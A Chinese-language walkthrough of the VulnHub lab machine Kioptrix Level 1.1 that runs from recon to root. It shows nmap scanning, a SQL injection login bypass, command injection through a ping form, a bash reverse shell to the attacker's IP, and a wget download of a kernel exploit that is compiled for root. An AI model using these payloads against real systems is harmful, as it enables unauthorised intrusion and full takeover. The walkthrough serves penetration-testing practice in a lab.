0x00.前言

公尚不惧生死,又何惧鞭挞。

0x01.靶机的基本信息

靶机名称:Kioptrix: Level 1.1 (#2)

发布日期:2011 年 2 月 11 日

靶机作者:Kioptrix

靶机地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

0x02.信息搜集

nmap -sn 192.168.31.1/24
image-20211220102447978
sudo nmap -sS -O -A -p 1-65535 192.168.31.71
image-20211220103638827
开放端口:
    22      ssh
    80        http
    111        rpcbind
    443        ssl/http
    631        ipp
    771        status
    3306    MySQL

0x03.前台SQL注入

前台有SQL注入漏洞,可以绕过登录进入后台。

admin' or 1=1#
image-20211220104004368

0x04.远程命令执行

后台是个执行ping命令的控制台,可能存在远程命令执行

image-20211220104117670

尝试如下命令:

127.0.0.1 & ls
image-20211220104341949

果不其然,在执行ping的同时,执行了拼接在后面的列目录命令。

0x05.反弹shell

既然可以命令执行,那么反弹一个shell过来。

nc -lvnp 4444        //本地nc监听,等待shell连接
127.0.0.1 & bash -i >& /dev/tcp/192.168.31.20/4444 0>&1
image-20211220124720584

0x06.Linux内核提权

目前是apache权限,查看下内核版本看能不能用内核提权。

uname -a
image-20211220124904985

内核版本为关键字去Google一下,第一个就是exp了。

image-20211220125117869
image-20211220125150100

将exp下载到本地,然后python开启一个http服务,

sudo python -m SimpleHTTPServer 5555

将exp上传到目标的/tmp文件夹下,

wget http://192.168.31.20:5555/9542.c
image-20211220125708055

用gcc编译,然后执行exp

gcc -o exp 9542.c
./exp
image-20211220130009480

这时候我们已经拿到root了。